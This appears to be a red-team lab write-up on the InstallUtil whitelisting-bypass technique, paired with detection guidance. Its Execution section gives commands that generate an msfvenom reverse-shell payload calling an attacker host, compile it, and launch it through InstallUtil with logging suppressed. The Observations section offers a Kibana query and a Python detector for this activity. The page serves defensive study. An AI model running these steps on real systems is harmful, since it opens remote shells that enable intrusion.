# InstallUtil

## Execution

First off, let's generate a C# payload (with the [InstallUtil script](https://github.com/khr0x40sh/WhiteListEvasion)) that contains shellcode from msfvenom, and upload the resulting temp.cs file to the victim's machine:

{% code title="attacker\@local" %}

```bash
python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windowsreverse_shell_tcp --lhost 10.0.0.5 --lport 443
```

{% endcode %}

Compile the .cs to an .exe:

{% code title="attacker\@victim" %}

```powershell
PS C:\Windows\Microsoft.NET\Framework\v4.0.30319> .\csc.exe C:\experiments\installUtil\temp.cs
```

{% endcode %}

Execute the payload:

{% code title="attacker\@victim" %}

```powershell
PS C:\Windows\Microsoft.NET\Framework\v4.0.30319> .\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Microsoft.NET\Framework\v4.0.30319\temp.exe
Microsoft (R) .NET Framework Installation utility Version 4.0.30319.17929
Copyright (C) Microsoft Corporation.  All rights reserved.

Hello From Uninstall...I carry out the real work...
```

{% endcode %}

Enjoy the sweet reverse shell:

![](/files/-LHUlRemzkmdPnsbKP5U)

## Observations

Look for `InstallUtil` processes that have established network connections, especially those with cmd or powershell processes running as children - treat them as suspicious and investigate the endpoint more closely:

![](/files/-LHUlaDwNxHutv7Ow4Vc)

A very primitive Kibana query for finding events where InstallUtil spawns cmd:

{% code title="kibana" %}

```
event_data.ParentCommandLine:"*installutil.exe*" && event_data.Image:cmd.exe
```

{% endcode %}
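The Kibana query above turned into runnable detection logic over constructed Sysmon-style process-creation records. This is an added example, not code from the page or from the WhiteListEvasion project: it generalises the query to both shells named in the Observations paragraph (cmd and powershell, matched on the image file name rather than a wildcard string) and adds a second rule for InstallUtil itself being launched with the `/U` and logging-suppression switches shown in the Execution section. Field names mirror the query's `event_data.*` keys; every path, command line and record below is constructed for the example.

```python
"""Flag Sysmon Event ID 1 (process create) records where InstallUtil.exe
spawns a shell, or is itself invoked with the quiet-uninstall switches.

Added example; sample events are constructed, not real telemetry."""
import json
import ntpath

SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed records shaped like the flattened Sysmon events the Kibana
# query targets (event_data.Image, event_data.ParentCommandLine, ...).
SAMPLE_EVENTS = [
    # 1. InstallUtil started with /logfile= /LogToConsole=false /U <assembly>
    json.dumps({"event_id": 1, "event_data": {
        "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
        "CommandLine": r".\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Microsoft.NET\Framework\v4.0.30319\temp.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}}),
    # 2. cmd.exe spawned by InstallUtil (what the Kibana query catches)
    json.dumps({"event_id": 1, "event_data": {
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe",
        "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"}}),
    # 3. powershell.exe spawned by InstallUtil (the query's cmd-only filter misses this)
    json.dumps({"event_id": 1, "event_data": {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop",
        "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"}}),
    # 4. cmd.exe spawned by explorer.exe: ordinary user activity, not flagged
    json.dumps({"event_id": 1, "event_data": {
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe"}}),
    # 5. InstallUtil doing a normal install of a constructed service: not flagged
    json.dumps({"event_id": 1, "event_data": {
        "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
        "CommandLine": r"InstallUtil.exe C:\Program Files\Contoso\ContosoService.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe"}}),
    # 6. A network-connection event (ID 3) and a non-JSON line: both skipped
    json.dumps({"event_id": 3, "event_data": {"Image": r"C:\x\InstallUtil.exe"}}),
    "not json at all",
]


def basename(path):
    """Lower-case file name of a Windows path, so matching ignores directory and case."""
    return ntpath.basename(path or "").lower()


def installutil_spawns_shell(ed):
    """Parent is InstallUtil.exe and the child is cmd.exe or powershell.exe."""
    return (basename(ed.get("ParentImage")) == "installutil.exe"
            and basename(ed.get("Image")) in SHELLS)


def installutil_quiet_uninstall(ed):
    """InstallUtil itself launched with /U plus a logging-suppression switch
    (/logfile= or /LogToConsole=false), the invocation shown above."""
    if basename(ed.get("Image")) != "installutil.exe":
        return False
    args = (ed.get("CommandLine") or "").lower().split()
    quiet = any(a.startswith("/logfile=") or a == "/logtoconsole=false" for a in args)
    return "/u" in args and quiet


RULES = {
    "installutil_spawns_shell": installutil_spawns_shell,
    "installutil_quiet_uninstall": installutil_quiet_uninstall,
}


def triage(lines):
    """Return (rule, Image, CommandLine) for every Event ID 1 record matching a rule.

    Non-JSON lines and other event IDs are ignored rather than raising."""
    findings = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if rec.get("event_id") != 1:
            continue
        ed = rec.get("event_data") or {}
        for name, rule in RULES.items():
            if rule(ed):
                findings.append((name, ed.get("Image", ""), ed.get("CommandLine", "")))
    return findings


if __name__ == "__main__":
    for rule, image, cmdline in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {image}\n    {cmdline}")
```

`/U` on its own is a legitimate uninstall switch, so the second rule keys on the combination with log suppression; in a real environment you would further tune it on the assembly path (anything outside known installer locations, or under a user-writable directory like the Framework folder used above, deserves a closer look) and join the hit against Event ID 3 records for the same process to recover the network connection the Observations paragraph could not find in Sysmon.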

![InstallUtil launching the malicious payload](/files/-LHUsNMxVLuWKHFkmlhs)

![csc.exe created a temp.exe which contains the reverse shell payload](/files/-LHUxQNLHymXzkR8SwSY)

What is interesting is that I could not see an established network connection logged in sysmon logs, although I could see other network connections from the victim machine being logged.

{% hint style="danger" %}
Will be coming back to this one for further inspection - possibly related to sysmon configuration.
{% endhint %}

## References

{% embed url="https://attack.mitre.org/wiki/Technique/T1118" %}

{% embed url="https://github.com/khr0x40sh/WhiteListEvasion" %}

